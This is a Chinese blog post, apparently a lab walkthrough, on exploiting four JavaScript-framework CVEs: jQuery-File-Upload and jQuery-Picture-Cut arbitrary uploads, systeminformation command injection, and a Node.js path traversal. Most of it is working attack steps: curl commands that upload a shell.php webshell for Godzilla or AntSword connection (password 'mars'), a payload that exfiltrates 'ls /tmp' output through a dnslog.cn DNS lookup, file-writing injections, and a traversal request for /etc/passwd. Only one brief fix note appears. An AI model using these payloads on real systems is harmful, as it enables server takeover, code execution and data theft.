基于JavaScript的框架漏洞

已于 2023-12-17 10:26:38 修改
阅读量2.6k 收藏 35
点赞数 50
文章标签: javascript ecmascript web安全 网络攻击模型 网络安全
于 2023-12-09 17:19:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68408599/article/details/134897545
版权

1、CVE-2018-9207(jquery框架)

1.1介绍

        这个漏洞产生主要是因为jQuery-File-Upload的.htaccess文件会限制文件的上传和文件的执行,但是Apache的2.3.9版本中,Apache默认不再支持.htaccess了,而且默认是没有被开启的,所以导致攻击者可以任意上传脚本文件并执行。如果使用了另一种web容器的话(比如Nginx),那么基于.htaccess文件的保护则完全无效。

1.2首先在本地准备好一个后门木马shell.php

 

3b45fb0ff86aa3b4ad6be638689c528d.png

1.3上传文件myfile=@文件地址

curl -F "myfile=@shell.php" "ip地址/jquery-upload-file/php/upload.php"

1.4.验证是否成功

0b2a4a0cf2ebd42aeca3c72f839275d0.png

1.5.这里可以使用哥斯拉等工具进行连接,这里不过多赘述。

2、CVE-2018-9208

2.1介绍

picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

2.2.准备一个一句话木马的文件

3b45fb0ff86aa3b4ad6be638689c528d.png

2.3.使用curl进行连接,观察是否上传成功。

curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@shell.php" http://123.58.224.8:18483/jquery-picture-cut/src/php/upload.php
- -F "inputOfFile=file":指定上传文件的参数名为"file"。
- -F "request=upload":指定请求类型为上传。
- -F "enableResize=0":禁用图片缩放功能。
- -F "minimumWidthToResize=0":设置图片最小宽度为0,即不限制宽度。
- -F "minimumHeightToResize=0":设置图片最小高度为0,即不限制高度。
- -F "folderOnServer=/":指定上传到服务器的目录为根目录。
- -F "imageNameRandom=1":设置上传后的文件名为随机生成的文件名。
- -F "maximumSize=10000":设置上传文件的最大大小为10000字节。
- -F "enableMaximumSize=0":禁用最大文件大小限制。
- -F "file=@shell.php":指定要上传的文件为当前目录下的"shell.php"文件。
- http://123.58.224.8:18483/jquery-picture-cut/src/php/upload.php:指定上传的目标URL。

6472794cd06f5badafc3121117885b4b.png

2.4.使用蚁剑一键连接,连接密码为mars。

1244a3a6945977fc8618c6b690c87ac8.png

3、CVE-2021-21315(Node.js自身漏洞)

3.1介绍:

Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令,最终获取服务器最高权限。

修复:作为替代升级的一种变通方法,一定要检查或清理传递给si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad()的服务参数。只允许字符串,拒绝任何数组。

3.2.开启一个dns.log网址,申请一个域名

 

2556a46cf49f2dfe28678f3cf90e19d0.png

3.3.输入以下payload:

http://118.193.36.37:57388/api/getServices?name[]=$(ping%20`ls%20/tmp`.qki7ut.dnslog.cn)

3.4.访问原来的dnslog网站,可以查看到falg

 

fce25ca1104b79f7c75f987fae722da1.png

3.5.也可以创建文件

http://192.168.32.161:8000/api/getServices?name[]=$(echo -e ‘NULL’ > 1.txt)
http://ip:8000/api/getServices?name[]=$(echo -e 'zeeker' > test.txt)

 

c1fa6f0dda3c46f15afb8bf396f3bd56.png

4、CVE-2017-14849(目录穿越)

4.1介绍

Node.js 8.5.0 对⽬录进⾏normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如…/…/…/…/…/…/etc/passwd),在中间位置增加foo/…/(如…/…/…/foo/…/…/…/…/etc/passwd),即可使normalize返回/etc/passwd,但实际上正确结果应该是…/…/…/…/…/…/etc/passwd。express这类web框架,通常会提供了静态⽂件服务器的功能,这些功能依赖于 normalize函数。⽐如,express在判断path是否超出静态⽬录范围时,就⽤到了normalize函数,上述BUG导致normalize函数返回错误结果导致绕过了检查,造成任意⽂件读取漏洞。

4.2.打开网址

 

bef3df32bd9eff2a821c518377abb28e.png

4.3.输入以下payload,这里尝试直接使用hackerbar发包,发现发送的东西不可读。

原因:浏览器解析的时候,不能解析/../,于是请求的结果变成了static/a/etc/passwd,导致请求结果错误。

static/../../../a/../../../../etc/passwd

 

55e81d4e4dbbc1c964081e45e5bf41c8.png

4.4.所以还是得使用burpsuit进行构造,这里发现获取到了信息。

e49ca4d8bfafba9e33240126d3628d43.png

 

 

 

 

B10SS0MS
关注
  • 50
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
JS中常见的安全漏洞
qq_34309704的博客
04-09 1万+
  1、基于DOM的跨站点脚本编制(XSS) ①XSS(Cross Site Script):跨站点脚本编制,指的是攻击者向合法的web页面插入恶意的脚本代码(通常是是HTML代码和JS代码),然后提交给服务器,随即服务器响应页面(被植入的恶意脚本代码),攻击者可以利用这些恶意脚本代码进行会话挟持登攻击。例如:攻击者在论坛中放一个看似安全得连接,骗取用户点击之后,盗取cookies得用户隐私信...
WEB攻防-JS应用&安全案例&泄漏云配置&接口调试&代码逻辑&框架漏洞自检
siu~
12-01 632
知识点: ```bash 1、JavaScript安全-泄漏配置信息 2、JavaScript安全-获取接口测试 3、JavaScript安全-代码逻辑分析 4、JavaScript安全-框架漏洞检测
记录一个等保二的项目的漏洞处理
05-12 1万+
一、高危漏洞: 1、HTTP.sys remote code execution vulnerability(HTTP.sys 远程代码执行漏洞漏洞描述: HTTP 协议栈 (HTTP.sys) 中存在一个远程执行代码漏洞,该漏洞是由于 HTTP.sys 不正确地分析特制 HTTP 请求而导致的。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 对于 Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Wind
JavaScript原型链污染原理及相关CVE漏洞剖析
最新发布
白帽黑客八哥的博客
05-28 698
有些JavaScript的函数支持根据指定的路径修改或定义对象的属性值。通常这些函数类似以下的形式:theFunction(object, path, value),将对象object的指定路径path上的属性值修改为value。如果攻击者可以控制路径path的值,那么将路径设置为_proto_.theValue,运行theFunction函数之后就有可能将theValue属性注入到object的原型中。
Javascript框架漏洞验证,劲爆
04-17 695
经常看到漏扫扫出来这个漏洞,查看了网上好多文章都没有正确的验证方法都在扯淡。今天我来点干货记录一下这个漏洞到底是怎么触发JS生成XSS的,也方便后面漏洞验证报告的书写。AWVS扫出来的JS框架漏洞RSAS扫出来的JS框架漏洞
Javascript框架漏洞验证
热门推荐
wangyuxiang946的博客
11-11 1万+
Javascript框架漏洞 ????前言????漏洞验证????漏洞描述????解决办法????免费福利 ????前言 经常看到漏扫扫出来这个漏洞,查看了网上好多文章都没有正确的验证方法都在扯淡。今天我来点干货记录一下这个漏洞到底是怎么触发JS生成XSS的,也方便后面漏洞验证报...
WebPenFw:基于Flask框架,实现Web漏洞信息收集与利用
04-11
WebPenFw是一个基于Python Flask框架构建的Web漏洞信息收集与利用工具。Flask是一个轻量级的Web服务器网关接口(WSGI)Web应用框架,以其简洁和模块化的特性而受到开发者们的喜爱。它提供了基础的路由、模板渲染、...
JavaScript引擎漏洞检测方法综述.pdf
01-03
为了提高检测效率,研究人员提出了一个针对JavaScript引擎漏洞的基本检测框架,该框架结合了静态和动态分析的优势,旨在更全面地发现漏洞。同时,针对检测效率瓶颈,如模糊测试的种子生成和路径探索优化等问题,也...
JavaScript 常见安全漏洞和自动化检测技术
12-02
JavaScript常见的安全漏洞主要包括基于DOM的跨站脚本(XSS)和重定向攻击。XSS攻击分为反射型和持久型,攻击者通过注入恶意脚本,可以窃取用户信息或进行会话劫持。基于DOM的XSS是一种不依赖服务器响应的新型XSS,它...
基于JavaEE的快速开发框架
12-20
提供JavaScript脚本引擎支持,允许JavaScript与JavaBean自由交互,并且可以发布JavaScript为服务;以及使用Javacript作为复杂规则验证器。 提供Hadoop存取支持。 模块化开发,使用注解简化配置,增强代码可读性与...
JavaScript框架资源整合.part2
03-29
JavaScript框架资源整合.part2
abtest-js:一个简单的 AB 测试 Javascript
07-07
ABTestJS ABTestJS 是一个 A/B 测试 javascript ,它允许开发人员轻松比较同一部署服务的两个版本,并确定最佳解决方案。 易于扩展,它允许通过上传替代 CSS 或提供同一页面的不同版本对多种服务执行 A/B 测试。 简单重定向 此测试对于在站点版本之间重定向用户、更改域名中的特定部分很有用。 例子: => beta.example.com site.v1.example.com => site.v2.example.com 它将引用者存储在 cookie 中,以便在重定向后可以检索到它 使用以下代码片段配置 A/B 测试 包括脚本 < script type =" text/javascript " charset =" utf-8 " src =" src/ABTest.js " > </ script > < script type =" te
Tplay是一款基于ThinkPHP5013layui2245Mysql开发的后台管理框架
08-08
Tplay是一款基于ThinkPHP5.0.13 layui2.2.45 Mysql开发的后台管理框架,PHP版本要求提升到5.5,Tplay集成了一般应用所必须的功能模块,为开发者减少重复性的工作,提升开发速度,规范团队开发模式。
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3085
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
JS敏感信息泄露:不容忽视的WEB漏洞
swordheart的博客
04-24 4978
0x00 前言 这段时间jsonp漏洞再一次证明了一个微小的漏洞,经过攻击者的巧妙而持久的利用,也会对企业和用户造成巨大的危害。而本文将要介绍的JS泄露敏感信息问题也是如此,攻击者不仅可以轻松收集用户手机号,姓名等隐私信息,更可以借此攻入企业后台甚至是getshell。本文将通过一些公开和未公开的漏洞详细阐述此类漏洞。 0x01 漏洞成因 JavaScript作为一种相当简单但功能强大的客户端脚本语言,本质是一种解释型语言。所以,其执行原理是边解释边运行。上述特性就决定了JavaScript与一些服务
Google Chrome RCE漏洞 CVE-2020-6507 和 CVE-2024-0517 流程分析
黑剑
01-25 2163
Google Chrome 在关闭沙箱安全情况下,通过EXP进行远程代码执行
基于JavaScript框架漏洞_javascript框架漏洞网络安全开发需要学什么
m0_74931199的博客
04-06 773
Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令,最终获取服务器最高权限。修复:作为替代升级的一种变通方法,一定要检查或清理传递给**si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad()**的服务参数。只允许字符串,拒绝任何数组。
【高危】crypto-js<3.2.1 存在不安全的随机性漏洞
murphysec的博客
06-19 2117
crypto-js 是一个 JavaScript 加密,用于在浏览器和 Node.js 环境中执行加密和解密操作。crypto-js 3.2.1 之前版本中的 secureRandom 函数通过将字符串 0. 和三位随机整数拼接的格式生成加密字符串,攻击者可通过爆破破解加密字符。
xss 跨站脚本攻击漏洞
08-29
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,攻击者利用这个漏洞向网站中注入恶意代码,并在用户浏览器上执行。这种攻击通常发生在存在输入输出的网页应用程序中。 XSS攻击主要分为三种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值